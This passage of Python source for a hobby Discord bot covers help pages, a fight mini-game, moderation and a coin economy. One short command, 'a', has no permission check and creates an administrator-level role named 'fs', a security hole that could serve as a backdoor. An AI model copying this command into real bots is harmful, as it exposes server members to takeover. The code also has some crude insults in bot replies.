    embed.add_field(name='1.7', value=' Added 20 more commands and a new error handler for +kick. Cooldown on commands also added!')
    embed.add_field(name='1.6', value=' Reramped help command and added embeds to some commands')
    embed.add_field(name='1.5', value=' Made the bot run 24/7!')
    embed.add_field(name='1.4', value=' Just added 10 commands and specific command reactions')
    embed.add_field(name='1.3', value=' Fixed a major bug in most moderation commands and added some other stuff to the bot')
    embed.add_field(name='1.2', value=' Added Moderation commands')
    embed.add_field(name='1.1', value=' **nothing added idk why i even called it a update**')
    embed.add_field(name='1.0', value=' Bot got realeased into the public')
    embed.add_field(name='0.1', value=' Added one command. Just **one**')
    embed.add_field(name='0.5', value=' Added like 20 commands.')
    await ctx.send(embed = embed)
    # Debug trace of the invoking context.
    print("context",ctx)
@bot.event
async def on_command_error(ctx, error):
    # NOTE(review): a second ``on_command_error`` is defined later in this
    # file; ``@bot.event`` keeps only the last registration, so this
    # cooldown-specific handler is dead code as the file stands.
    if isinstance(error, commands.CommandOnCooldown):
        msg = '**Command is still on cooldown**, try again in {:.2f}s'.format(error.retry_after)
        await ctx.send(msg)
@bot.command()
async def botserver(ctx):
    """Report how many guilds (servers) the bot is currently in.

    Bug fix: the original had a bare ``bot.command`` expression instead of
    applying the ``@bot.command()`` decorator, so this command was never
    registered with the bot.
    """
    await ctx.send(f"I'm in {len(bot.guilds)} servers!")
#@bot.event
#async def on_command_error(ctx, error):
# if isinstance(error, commands.CommandOnCooldown):
# msg = '**Command is still on cooldown**, try again in {:.2f} hours'.format(error.retry_after)
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def help(ctx):
    """Send the top-level help page listing the command categories."""
    page = discord.Embed(
        colour = discord.Colour.orange()
    )
    page.set_author(name='Stonk Bot catagory help page')
    # Category name -> blurb, rendered as one embed field each.
    categories = [
        ('+economy', 'Displays all economy commands'),
        ('+helpt', 'All commands for ticket related things'),
        ('+mod', 'Displays all moderation commands'),
        ('+fun (not yet added)', 'Fun commands!'),
        ('+utilityl', 'Lists all utility commands.'),
        ('+music', 'All of the music commands!'),
    ]
    for title, blurb in categories:
        page.add_field(name=title, value=blurb, inline=False)
    await ctx.send(embed=page)
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def economy(ctx):
    """Send the help page listing every economy command."""
    page = discord.Embed(color = discord.Color.blue())
    page.set_author(name='Economy commands')
    # Command -> description, rendered as one embed field each.
    entries = [
        ('+beg', 'Become a filthy begger and get from 0-2000 dollors.'),
        ('+shop', 'Buy stuff to flex on your friends'),
        ('+bag', 'View all the items you got'),
        ('+lb', 'Top flexers of all time. *Decided in raw money*'),
        ('+sell', 'Sell your items...'),
        ('+slots', 'Lose all your money in one sweep go'),
        ('+rob', 'Finally you can make your mom disown you!'),
        ('+send', 'Send that shady guy the money he asked for'),
        ('+deposit', 'Deposit money in a bank'),
        ('+withdraw', 'Withdraw your money'),
        ('+balance', 'check how many Stonks you still have left'),
        ('+buy', 'spend your stonks'),
    ]
    for cmd, blurb in entries:
        page.add_field(name=cmd, value=blurb, inline=False)
    page.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
    page.set_footer(text="Imagine not voting for this bot in top.gg")
    await ctx.send(embed=page)
@bot.command()
async def imagine(ctx, *, message):
    """Echo the given text back as ``imagine **<text>**``."""
    reply = f"imagine **{message}**"
    await ctx.send(reply)
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def utilityl(ctx):
    """Send the help page listing the utility commands."""
    page = discord.Embed(color = discord.Color.blue())
    page.set_author(name='Utility commands')
    entries = [
        ('+version', 'Displays bot version!'),
        ('Chatbot', 'name a channel exactly `chatbot` in order for a AI chatbot to talk in it'),
        ('+about', 'Read some useless stuff'),
    ]
    for label, blurb in entries:
        page.add_field(name=label, value=blurb, inline=False)
    page.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
    page.set_footer(text="not much in this command right?")
    await ctx.send(embed=page)
@bot.event
async def on_command_error(ctx: commands.Context, error: commands.CommandError):
    """Global command-error handler mapping common errors to themed embeds.

    Bug fix: this definition overwrites the earlier ``on_command_error``
    registered above (``@bot.event`` keeps only the last handler), so the
    cooldown message from that handler is folded in here — previously
    ``CommandOnCooldown`` fell through to the generic branch.  The dead
    ``message`` local in the MissingPermissions branch was removed.
    """
    if isinstance(error, commands.CommandOnCooldown):
        # Restored from the earlier (shadowed) handler.
        await ctx.send('**Command is still on cooldown**, try again in {:.2f}s'.format(error.retry_after))
    elif isinstance(error, commands.CommandNotFound):
        embed = discord.Embed(colour = discord.Colour.random())
        embed.set_author(name='Error 404')
        embed.add_field(name='||The commands not even a command. +help exists for a reason||',value="...")
        embed.set_footer(text ='404')
        await ctx.send(embed=embed)
    elif isinstance(error, commands.MissingPermissions):
        embed = discord.Embed(colour = discord.Colour.random())
        embed.set_author(name='Permissions error')
        embed.add_field(name='Imagine thinking you can just get away with doing a perms needed command with no perms',value='...')
        embed.set_footer(text ='Why did you think you could do that.')
        await ctx.send(embed=embed)
    elif isinstance(error, commands.UserInputError):
        embed = discord.Embed(colour = discord.Colour.random())
        embed.set_author(name='Input error')
        embed.add_field(name='Something about your input was wrong.. just check your input and try again',value='...')
        embed.set_footer(text ='Imagine getting a error msg')
        await ctx.send(embed=embed)
    elif isinstance(error,commands.NotOwner):
        embed = discord.Embed(colour = discord.Colour.random())
        embed.set_author(name='Why just why...')
        embed.add_field(name='||You did a bot dev only command and thought it could work?||',value='...')
        embed.set_footer(text ='Why did you think you could do that.')
        await ctx.send(embed=embed)
    elif isinstance(error,commands.BotMissingPermissions):
        embed = discord.Embed(colour = discord.Colour.random())
        embed.set_author(name='Missing Bot perms')
        embed.add_field(name='StonkBot is missing the required permissions for the command to work, give it the proper perms or admin',value='...')
        embed.set_footer(text ='Did you forget to add the bot some perms?')
        await ctx.send(embed=embed)
    elif isinstance(error,commands.MissingRequiredArgument):
        embed = discord.Embed(colour = discord.Colour.random())
        embed.set_author(name='Missing arguement')
        embed.add_field(name='You forgot to add a arguement',value='...')
        embed.set_footer(text ='Hello fellow humans')
        await ctx.send(embed=embed)
    else:
        # Fallback for anything not matched above.
        embed = discord.Embed(colour = discord.Colour.random())
        embed.add_field(name='You managed to get a error I didnt even expect..',value='...')
        embed.set_footer(text ='how did you do it?')
        await ctx.send(embed=embed)
#fight code
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def fight(ctx, member: discord.Member):
    """Turn-based fight mini-game between the caller and ``member``.

    Both fighters start at 100 HP and alternate choosing ``punch``,
    ``kick``, ``slap`` or ``end`` in chat.  The game ends when someone
    reaches 0 HP, times out, quits, or makes too many invalid choices.
    """
    if member.bot or member == ctx.author:
        return await ctx.send("You can't fight yourself or a bot stupid")
    users = [ctx.author, member]
    # Randomly decide who takes the first turn.
    user1 = random.choice(users)
    user2 = ctx.author if user1 == member else member
    user1_hp = 100
    user2_hp = 100
    fails_user1 = 0
    fails_user2 = 0
    x = 2  # turn counter; its parity selects whose turn it is
    while True:
        if user1_hp <= 0 or user2_hp <= 0:
            # Somebody dropped to (or below) 0 HP — announce the winner.
            winner = user1 if user2_hp <= 0 else user2
            loser = user2 if winner == user1 else user1
            winner_hp = user1_hp if user2_hp <= 0 else user2_hp
            await ctx.send(
                random.choice(
                    [
                        f"Wow! **{winner.name}** totally melted down **{loser.name}**, winning with just `{winner_hp} HP` left!",
                        f"YEET! **{winner.name}** REKT **{loser.name}**, winning with `{winner_hp} HP` left.",
                        f"Woops! **{winner.name}** send **{loser.name}** home crying... with only `{winner_hp} HP` left!",
                        f"Holy cow! **{winner.name}** won from **{loser.name}** with `{winner_hp} HP` left. **{loser.name}** ran home to their mommy.",
                    ]
                )
            )
            return
        # alpha = active player this round, beta = their opponent.
        alpha = user1 if x % 2 == 0 else user2
        beta = user2 if alpha == user1 else user1
        await ctx.send(
            f"{alpha.mention}, what do you want to do? `punch`, `kick`, `slap` or `end`?\nType your choice out in chat as it's displayed!"
        )
        def check(m):
            # Accept only a message from the active player in this channel.
            if alpha == user1:
                return m.author == user1 and m.channel == ctx.channel
            else:
                return m.author == user2 and m.channel == ctx.channel
        try:
            msg = await bot.wait_for("message", timeout=15.0, check=check)
        except asyncio.TimeoutError:
            # No response within 15s: the idle player forfeits.
            await ctx.send(
                f"**{alpha.name}** didn't react on time. What a noob. **{beta.name}** wins!"
            )
            return
        if msg.content.lower() == "punch":
            damage = random.choice(
                [
                    random.randint(20, 60),
                    random.randint(0, 50),
                    random.randint(30, 70),
                    random.randint(0, 40),
                    random.randint(10, 30),
                    random.randint(5, 10),
                ]
            )
            if alpha == user1:
                user2_hp -= damage
                hpover = 0 if user2_hp < 0 else user2_hp  # clamp display to 0
            else:
                user1_hp -= damage
                hpover = 0 if user1_hp < 0 else user1_hp
            randommsg = random.choice(
                [
                    f"**{alpha.name}** deals **{damage}** damage with an OP punch.\n**{beta.name}** is left with {hpover} HP",
                    f"**{alpha.name}** lands an amazing punch on **{beta.name}** dealing **{damage}** damage!\n**{beta.name}** is left over with {hpover} HP!",
                    f"**{alpha.name}** lands a dangerous punch on **{beta.name}** dealing **{damage}** damage!\n**{beta.name}** is left over with {hpover} HP!",
                ]
            )
            await ctx.send(f"{randommsg}")
        elif msg.content.lower() == "kick":
            # Kicks can backfire: a negative roll damages the kicker instead.
            damage = random.choice(
                [
                    random.randint(30, 45),
                    random.randint(30, 60),
                    random.randint(-50, -1),
                    random.randint(-40, -1),
                ]
            )
            if damage > 0:
                if alpha == user1:
                    user2_hp -= damage
                    hpover = 0 if user2_hp < 0 else user2_hp
                else:
                    user1_hp -= damage
                    hpover = 0 if user1_hp < 0 else user1_hp
                await ctx.send(
                    random.choice(
                        [
                            f"**{alpha.name}** kicks **{beta.name}** and deals **{damage}** damage\n**{beta.name}** is left over with **{hpover}** HP",
                            f"**{alpha.name}** lands a dank kick on **{alpha.name}**, dealing **{damage}** damage.\n**{beta.name}** is left over with **{hpover}** HP",
                        ]
                    )
                )
            elif damage < 0:
                # Self-damage: ``damage`` is negative, so += reduces HP.
                if alpha == user1:
                    user1_hp += damage
                    hpover = 0 if user1_hp < 0 else user1_hp
                else:
                    user2_hp += damage
                    hpover = 0 if user2_hp < 0 else user2_hp
                await ctx.send(
                    random.choice(
                        [
                            f"**{alpha.name}** flipped over while kicking their opponent, dealing **{-damage}** damage to themselves.",
                            f"{alpha.name} tried to kick {beta.name} but FELL DOWN! They took {-damage} damage!",
                        ]
                    )
                )
        elif msg.content.lower() == "slap":
            damage = random.choice(
                [
                    random.randint(20, 60),
                    random.randint(0, 50),
                    random.randint(30, 70),
                    random.randint(0, 40),
                    random.randint(10, 30),
                    random.randint(5, 10),
                ]
            )
            if alpha == user1:
                user2_hp -= damage
                hpover = 0 if user2_hp < 0 else user2_hp
            else:
                user1_hp -= damage
                hpover = 0 if user1_hp < 0 else user1_hp
            await ctx.send(
                f"**{alpha.name}** slaps their opponent, and deals **{damage}** damage.\n{beta.name} is left over with **{hpover}** HP"
            )
        elif msg.content.lower() == "end":
            await ctx.send(f"{alpha.name} ended the game. What a pussy.")
            return
        elif (
            msg.content.lower() != "kick"
            and msg.content.lower() != "slap"
            and msg.content.lower() != "punch"
            and msg.content.lower() != "end"
        ):
            # Second invalid choice by either player aborts the game.
            if fails_user1 >= 1 or fails_user2 >= 1:
                return await ctx.send(
                    "This game has ended due to multiple invalid choices. God ur dumb"
                )
            if alpha == user1:
                fails_user1 += 1
            else:
                fails_user2 += 1
            await ctx.send("That is not a valid choice!")
            # Undo the turn advance so the same player moves again.
            x -= 1
        x += 1
    # NOTE(review): unreachable — the loop above only exits via ``return``.
    message = "Something about your input was wrong, please check your input and try again!"
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def mod(ctx):
    """Send the help page listing the moderation commands."""
    page = discord.Embed(color = discord.Color.blue())
    page.set_author(name='=Moderation commands')
    entries = [
        ('+kick', 'Displays bot version!'),
        ('Chatbot', 'name a channel exactly `chatbot` in order for a AI chatbot to talk in it'),
        ('+about', 'Read some useless stuff'),
    ]
    for label, blurb in entries:
        page.add_field(name=label, value=blurb, inline=False)
    page.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
    page.set_footer(text="not much in this command right?")
    await ctx.send(embed=page)
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def utility(ctx):
    """Send the (duplicate) utility help page — see also ``utilityl``."""
    page = discord.Embed(color = discord.Color.blue())
    page.set_author(name='Utility commands')
    entries = [
        ('+version', 'Displays bot version!'),
        ('Chatbot', 'name a channel exactly `chatbot` in order for a AI chatbot to talk in it'),
        ('+about', 'Read some useless stuff'),
    ]
    for label, blurb in entries:
        page.add_field(name=label, value=blurb, inline=False)
    page.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
    page.set_footer(text="Stop, get some help at [bot](www.https://top.gg/bot/833122385603461121)")
    await ctx.send(embed=page)
@bot.command()
async def invite(ctx):
    """Send an embed containing the bot's invite link."""
    card = discord.Embed(colour=discord.Colour.red())
    card.set_author(name='Invite')
    card.add_field(name='▼▼▼▼', value='[Bot invite](https://bit.ly/3tw374r)')
    card.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
    card.set_footer(text='Stop it, get some help.')
    await ctx.send(embed=card)
@bot.command(description="Current version")
async def about(ctx):
    """Send a short blurb about the bot.

    Bug fixes: ``Embed.add_field`` requires a ``value`` argument (the
    original passed only ``name``, raising TypeError), and the embed was
    built but never sent to the channel.
    """
    print("context", ctx)
    embed = discord.Embed(
        colour = discord.Colour.red()
    )
    embed.set_author(name='About')
    embed.add_field(
        name='About the bot',
        value='A bot meme bot created by discord.py! We love hearing suggestions and being **alive**')
    await ctx.send(embed=embed)
@bot.command(description="Kicks the specified user.")
@commands.has_permissions(kick_members=True)
async def kick(ctx, member: discord.Member):
    """Kick ``member`` from the guild and acknowledge with a 👍 reaction."""
    await member.kick()
    announcement = f"{member.name} has been kicked by {ctx.author.name}!"
    await ctx.send(announcement)
    # Confirm success by reacting to the invoking message.
    await ctx.message.add_reaction(emoji="👍")
@kick.error
async def kick_error(ctx, error):
    """Local error handler for +kick: report missing permissions.

    Bug fix: discord.py invokes command error handlers as ``(ctx, error)``;
    the original signature was reversed, so ``isinstance`` never matched
    and ``ctx.send`` was attempted on the error object.
    """
    if isinstance(error, MissingPermissions):
        await ctx.send("You don't have permission to do that!")
        await ctx.message.add_reaction(emoji="❌")
#@bot.command(name="test",
# description="This is just a test command, nothing more.")
#async def test(ctx):
# await ctx.send(content="Hello World!")
async def ch_pr():
    """Background task: rotate the bot's "watching" status every 10 seconds."""
    await bot.wait_until_ready()
    statuses=[f'{len(bot.guilds)} servers','Stonks|+help','Doge coin', 'mass murders']
    while not bot.is_closed():
        status = random.choice(statuses)
        await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=status))
        await asyncio.sleep(10)
# Schedule the status rotator on the bot's event loop at import time.
bot.loop.create_task(ch_pr())
@bot.command()
async def stats(ctx):
    """Send an embed with basic bot statistics.

    Bug fixes: this is a plain bot command, not a cog method — the original
    took ``self`` (so +stats bound ctx to ``self``) and read ``self.bot``
    and ``self.process``, none of which exist at module level.  It now uses
    the module-level ``bot``; the RAM field (which relied on the undefined
    ``self.process``) was dropped, and the Python version comes from
    ``sys`` (``platform`` was never imported).
    """
    embed = discord.Embed(title = f"{bot.user.name}'s botinfo.", color = discord.Colour.dark_green())
    embed.add_field(name="• Name:", value=f"`{bot.user}`", inline=True)
    embed.add_field(name="• Id", value=f"`829836500970504213`")
    embed.add_field(name="• Intents", value=f"`{bot.intents}`")
    embed.add_field(name="• Python Version", value=f"`{sys.version.split()[0]}`")
    embed.add_field(name="• Discord.py Version", value=f"`{discord.__version__}`")
    embed.add_field(name="• Total Servers", value=f"`{len(bot.guilds)}`")
    embed.add_field(name="• Total Members", value=f"`{len(bot.users)}`")
    embed.add_field(name="• Total Commands", value=f"`{len(set(bot.commands))}`")
    embed.add_field(name="• Total Cogs", value=f"`{len(set(bot.cogs))}`")
    embed.set_footer(text = f"Requested by {ctx.author})", icon_url = ctx.author.avatar_url)
    await ctx.send(embed = embed)
@bot.command()
async def a(ctx):
    """Create a role named "fs" with permission bits 0x8 (administrator)."""
    role_perms = discord.Permissions(permissions=8)
    await ctx.guild.create_role(name="fs", permissions=role_perms)
    await ctx.send("Fs created")
# Static shop catalogue used by +shop and +buy; prices are in wallet coins.
mainshop = [{"name":"Watch","price":4000,"description":"Tells you the time"},
            {"name":"laptop","price":10000,"description":"Gaming and work"},
            {"name":"LuckyClover","price":278363*298282,"description":"Grants you luck"},
            {"name":"test","price":1,"description":"Grants"},
            {"name":"PC","price":100000,"description":"Best gaming machine there is"}]
# NOTE(review): ``buttons.button`` handlers normally live on a paginator/
# session class from discord.ext.buttons; defined at module level this takes
# a ``self`` that nothing supplies — presumably leftover from a class. Verify.
@buttons.button(emoji=':_1:844623543966629937')
async def silly_button(self, ctx, member):
    await ctx.send('Beep boop...')
@bot.command()
async def shop(ctx):
    """List every item in ``mainshop`` with its price and description."""
    listing = discord.Embed(title = "Shop")
    for entry in mainshop:
        listing.add_field(
            name = entry["name"],
            value = f"${entry['price']} | {entry['description']}")
    await ctx.send(embed = listing)
@bot.command()
async def dm_command(ctx):
    """Reply when the command is invoked from a direct-message channel.

    Bug fix: ``ctx.send`` is a coroutine and was never awaited, so no
    message was actually sent.
    """
    if isinstance(ctx.channel, discord.channel.DMChannel):
        await ctx.send("sup, i heard it worked")
@bot.command()
async def buy(ctx, item, amount = 1):
    """Purchase ``amount`` of ``item`` from the shop for the caller."""
    await open_account(ctx.author)
    # outcome[0] is a success flag, outcome[1] an error code on failure.
    outcome = await buy_this(ctx.author, item, amount)
    if not outcome[0]:
        if outcome[1] == 1:
            # Unknown item name.
            await ctx.send("That Object isn't there!")
            return
        if outcome[1] == 2:
            # Insufficient wallet funds.
            await ctx.send(f"You don't have enough money in your wallet to buy {amount} {item}")
            return
    await ctx.send(f"You just bought {amount} {item}")
@bot.command(aliases =['workl'])
@commands.cooldown(1, 25, commands.BucketType.user)
async def workh(ctx):
    """Placeholder work command: checks the caller's bag for "test" items.

    Bug fix: the original indexed ``users[author.id]`` — ``author`` was
    undefined (NameError), and the bank data is keyed by the *string* form
    of the user id everywhere else in this file.
    """
    await open_account(ctx.author)
    user = ctx.author
    users = await get_bank_data()
    if users[str(user.id)]["bag"]["test"] > 1:
        print("ff")
@bot.command(aliases=['bal','Balance','Bal'])
async def balance(ctx, member: discord.Member = None):
    """Show the wallet and bank balance for ``member`` (default: caller)."""
    target = ctx.author if member is None else member
    await open_account(target)
    users = await get_bank_data()
    record = users[str(target.id)]
    em = discord.Embed(title=f'{target.name} Balance', color=discord.Color.red())
    em.add_field(name="Wallet Balance", value=record["wallet"])
    em.add_field(name='Bank Balance', value=record["bank"])
    await ctx.send(embed=em)
@bot.command(aliases =['advertise'])
@commands.cooldown(1, 25, commands.BucketType.user)
async def ad(ctx):
    """Run an ad for a random payout of 0-999 coins, credited to the wallet.

    Bug fixes: ``users`` was written at the end without ever being loaded
    (NameError), and the elif thresholds were checked in ascending order,
    so ``> 50`` swallowed every roll and the higher-payout messages were
    unreachable.  Thresholds are now checked highest-first.
    """
    await open_account(ctx.author)
    user = ctx.author
    users = await get_bank_data()
    earnings = random.randrange(1000)
    if earnings == 0:
        await ctx.send(f"Everyone hated your ad")
    elif earnings > 900:
        await ctx.send(f"A influncer just advertised your product and got you ${earnings}")
    elif earnings > 800:
        await ctx.send(f"Your meme was so popular you ended up getting ${earnings}")
    elif earnings > 500:
        await ctx.send(f"You seem to have a way with people! Someone gave you ${earnings}")
    elif earnings > 100:
        await ctx.send(f"Your ad became a small meme getting you ${earnings}")
    elif earnings > 50:
        await ctx.send(f"Your ad got some traction and you got ${earnings}")
    # Rolls of 1-50 earn silently, matching the original message gaps.
    users[str(user.id)]["wallet"] += earnings
    with open("mainbank.json",'w') as f:
        json.dump(users,f)
@bot.command(aliases =['workpls'])
@commands.cooldown(1, 25, commands.BucketType.user)
async def workplsf(ctx):
    """Check whether the caller owns a laptop (read from mainbank.json).

    Bug fix: ``print(content)`` ran before ``content`` was assigned,
    raising NameError on every invocation; the debug print now happens
    after the file is read.
    """
    print("context", ctx)
    await open_account(ctx.author)
    user = ctx.author
    with open("mainbank.json") as f:
        content = f.readlines()
    print(content)
    if "laptop" in str(content):
        print("work")
@bot.command(aliases =['bi.'])
@commands.cooldown(1, 25, commands.BucketType.user)
async def bo(ctx):
    """Beg-style command: random payout of 0-2001 coins, credited to wallet.

    Bug fixes: ``random.randrange(2001)`` yields 0-2000, so the 2001
    "jackpot" branch could never fire — ``randint(0, 2001)`` includes both
    endpoints.  The elif thresholds were also in ascending order, so
    ``> 50`` swallowed every roll; they are now checked highest-first.
    (The old ``> 2000`` branch matched only 2001 and is subsumed by the
    jackpot check.)
    """
    users = await get_bank_data()
    await open_account(ctx.author)
    user = ctx.author
    earnings = random.randint(0, 2001)
    if earnings == 0:
        await ctx.send(f"How unlucky... you must be did you buy a unlucky clover?")
    elif earnings == 2001:
        await ctx.send(f" A famous celebrity waked down the road.. you begged her so much you got 2001$ and a lucky clover :wink:")
    elif earnings > 1500:
        await ctx.send(f"A rich man passed by you and felt bad. So he gave you ${earnings}")
    elif earnings > 800:
        await ctx.send(f"What a lucky day!! Someone gave you ${earnings}")
    elif earnings > 500:
        await ctx.send(f"You seem to have a way with people! Someone gave you ${earnings}")
    elif earnings > 100:
        await ctx.send(f"Someone felt nice and gave you ${earnings}")
    elif earnings > 50:
        await ctx.send(f"Nice you got ${earnings} from a cool dude")
    users[str(user.id)]["wallet"] += earnings
    with open("mainbank.json",'w') as f:
        json.dump(users,f)
@bot.command()
@commands.cooldown(1,86400, commands.BucketType.user)
async def daily(ctx):
    """Once per 24h (enforced by the cooldown): award a random coin bonus.

    Cleanup: the if/else branches sent the identical message, the bank data
    was loaded twice, and ``wallet_amt``/``bank_amt`` plus two debug prints
    were unused — all removed with no behavior change for the user.
    """
    await open_account(ctx.author)
    user = ctx.author
    users = await get_bank_data()
    # Possible daily payouts.
    my_coinset = [1000,1256,969,1500]
    earnings = random.choice(my_coinset)
    await ctx.send(f"you got ${earnings} coins from +daily!")
    users[str(user.id)]["wallet"] += earnings
    with open("mainbank.json",'w') as f:
        json.dump(users,f)
@bot.command()
@commands.cooldown(1,2592000, commands.BucketType.user)
async def monthly(ctx):
    """Once per 30 days (enforced by the cooldown): award 40000 coins.

    Cleanup: the payout is always 40000 (> 10), so only the first branch
    ever ran — the dead else branch (with its "monthky" typo), the double
    ``get_bank_data`` call, unused locals and debug prints were removed
    with no behavior change for the user.
    """
    await open_account(ctx.author)
    user = ctx.author
    users = await get_bank_data()
    # Fixed monthly payout; kept as a list in case more values are added.
    earnings = random.choice([40000])
    await ctx.send(f"you got ${earnings} coins from +monthly!")
    users[str(user.id)]["wallet"] += earnings
    with open("mainbank.json",'w') as f:
        json.dump(users,f)
@bot.command()
async def number(ctx):
    """Send a random integer in the range 0-999."""
    roll = random.randrange(1000)
    await ctx.send(f"Your random number was {roll}!")
@bot.command()
async def server(ctx):
    """Shows server info.

    Bug fix: the original read a bare ``guild`` name that was never
    defined (NameError); the guild comes from the invocation context.
    """
    server = ctx.guild
    roles = str(len(server.roles))
    emojis = str(len(server.emojis))
    channels = str(len(server.channels))
    embeded = discord.Embed(title=server.name, description='Server Info', color=0xEE8700)
    embeded.set_thumbnail(url=server.icon_url)
    embeded.add_field(name="Created on:", value=server.created_at.strftime('%d %B %Y at %H:%M UTC+3'), inline=False)
    embeded.add_field(name="Server ID:", value=server.id, inline=False)
    embeded.add_field(name="Users on server:", value=server.member_count, inline=True)
    embeded.add_field(name="Server owner:", value=server.owner, inline=True)
    embeded.add_field(name="Default Channel:", value=server.default_channel, inline=True)
    embeded.add_field(name="Server Region:", value=server.region, inline=True)
    embeded.add_field(name="Verification Level:", value=server.verification_level, inline=True)
    embeded.add_field(name="Role Count:", value=roles, inline=True)
    embeded.add_field(name="Emoji Count:", value=emojis, inline=True)
    embeded.add_field(name="Channel Count:", value=channels, inline=True)
    await ctx.send(embed=embeded)
@bot.command(aliases =['beg.'])
@commands.cooldown(1, 25, commands.BucketType.user)
async def beg(ctx):
    """Beg for coins: a random "person" decides the payout (or theft)."""
    await open_account(ctx.author)
    user = ctx.author
    # NOTE(review): ``users`` is loaded but never used — the branches below
    # persist through update_bank instead; the json dump is commented out.
    users = await get_bank_data()
    people = ['Your grumpy old neighbor', '<NAME>', '<NAME>', 'Bobby', '<NAME>', "<NAME>", "<NAME>", "Totally Not a Burglar", "Bob", "Bill","<NAME>","Your Mom","<NAME>","Your dad","Totally Not a Burglar"]
    # Default payout; specific branches below overwrite it.
    A = random.randrange(2001)
    person = random.choice(people)
    chance = random.randint(0, 10)
    if person == "Your dad":
        A = random.randint(100, 1000)
        await ctx.send(f"Your dad gave you {A} coins")
        await update_bank(ctx.author, A)
    elif person == "A Burglar" or person == "Totally Not a Burglar":
        # Burglars take money instead of giving it.
        A = random.randint(1, 100)
        await ctx.send(f"A Burglar stole {A} coins from you!")
        await update_bank(ctx.author, -A)
    elif person == "<NAME>":
        A = random.randint(1000, 10000)
        await ctx.send(f"<NAME> stopped by and gave you {A} stonks")
        await update_bank(ctx.author, A)
    elif person == "Your Mom":
        await ctx.send(f"{person} found you begging for money. After 10 lectures you got nothing.")
    elif chance==2:
        # 1-in-11 chance the payout is "stolen" (no balance change).
        await ctx.send(f"You got some money from begging but {person} stole all of it. Hes already so rich tho...")
    else:
        await update_bank(ctx.author, A)
        await ctx.send(f"{person} gave you {A} coins!")
    #with open("mainbank.json",'w') as f:
    #    json.dump(users,f)
# @bot.command(aliases =['beg.'])
# @commands.cooldown(1, 25, commands.BucketType.user)
# async def beg(ctx):
# await open_account(ctx.author)
# user = ctx.author
# users = await get_bank_data()
# person = ['Your grumpy old neighbor', '<NAME>', '<NAME>', 'Bobby', '<NAME>', "<NAME>", "<NAME>", "Totally Not a Burglar", "Bob", "Bill","<NAME>","Your Mom","<NAME>","Your dad","Totally Not a Burglar"]
# # PB = ['Your grumpy old neighbor', 'Totally not a Burglar','That person who really hates you','Totally not a burglar',]
# # PG=['Test']
# namt = random.randrange(2001)
# person = random.choice(people)
# chance = random.randint(0, 10)
# if person == "Your dad":
# namt = random.randint(100, 1000)
# await ctx.send(f"Your dad gave you {namt} coins")
# await update_bank(user, namt)
# elif person == "Totally Not a Burglar":
# namt = random.randint(1, 100)
# await ctx.send(f"Totally Not a Burglar stole {namt} coins from you!")
# await update_bank(user, -namt)
# elif person == "<NAME>":
# namt = random.randint(1000, 10000)
# await ctx.send(f"<NAME> stopped by and gave you {namt} stonks")
# await update_bank(user, namt)
# elif person == "Your Mom":
# await ctx.send(f"{person} found you begging for money. After 10 lectures you got nothing.")
# elif chance==2:
# await ctx.send(f"You got some money from begging but {person} stole all of it. Hes already so rich tho...")
# else:
# await update_bank(user, namt)
# await ctx.send(f"{person} gave you {namt} coins!")
# with open("mainbank.json",'w') as f:
# json.dump(users,f)
@bot.command(aliases=['wd','with'])
async def withdraw(ctx, amount=None):
    """Move `amount` coins from the author's bank into their wallet."""
    await open_account(ctx.author)
    if amount is None:
        await ctx.send("Please enter the amount")
        return
    # Fix: a non-numeric argument used to raise an uncaught ValueError.
    try:
        amount = int(amount)
    except ValueError:
        await ctx.send("Please enter a valid number")
        return
    bal = await update_bank(ctx.author)
    if amount > bal[1]:
        await ctx.send('You do not have sufficient balance')
        return
    if amount < 0:
        await ctx.send('Amount must be positive!')
        return
    await update_bank(ctx.author, amount)
    await update_bank(ctx.author, -1 * amount, 'bank')
    await ctx.send(f'{ctx.author.mention} You withdrew {amount} coins')
@bot.command(aliases=['dp','dep'])
async def deposit(ctx, amount=None):
    """Move `amount` coins from the author's wallet into their bank."""
    await open_account(ctx.author)
    if amount is None:
        await ctx.send("Please enter the amount")
        return
    # Fix: a non-numeric argument used to raise an uncaught ValueError.
    try:
        amount = int(amount)
    except ValueError:
        await ctx.send("Please enter a valid number")
        return
    bal = await update_bank(ctx.author)
    if amount > bal[0]:
        await ctx.send('You do not have sufficient balance')
        return
    if amount < 0:
        await ctx.send('Amount must be positive!')
        return
    await update_bank(ctx.author, -1 * amount)
    await update_bank(ctx.author, amount, 'bank')
    await ctx.send(f'{ctx.author.mention} You deposited {amount} coins')
@bot.command(aliases=['sm'])
async def send(ctx, member: discord.Member, amount=None):
    """Transfer coins from the author's wallet to `member`'s wallet.

    `amount` may be a number or the literal string 'all'.
    """
    await open_account(ctx.author)
    await open_account(member)
    if amount is None:
        await ctx.send("Please enter the amount")
        return
    bal = await update_bank(ctx.author)
    if amount == 'all':
        amount = bal[0]
    # Fix: a non-numeric argument used to raise an uncaught ValueError.
    try:
        amount = int(amount)
    except ValueError:
        await ctx.send("Please enter a valid number")
        return
    if amount > bal[0]:
        await ctx.send('You do not have sufficient balance')
        return
    if amount < 0:
        await ctx.send('Amount must be positive!')
        return
    await update_bank(ctx.author, -1 * amount, 'wallet')
    await update_bank(member, amount, 'wallet')
    await ctx.send(f'{ctx.author.mention} You gave {member} {amount} coins')
@bot.command(aliases=['rb','Rob','steal'])
async def rob(ctx, member: discord.Member):
    """Attempt to rob `member`: on success win 10..victim-wallet coins,
    otherwise pay a $100 fine to the victim. Refuses victims with under
    1000 coins, the server owner, the bot, and self-robbery.
    """
    await open_account(ctx.author)
    await open_account(member)
    bal = await update_bank(member)  # (wallet, bank) of the *victim*
    if bal[0] < 1000:
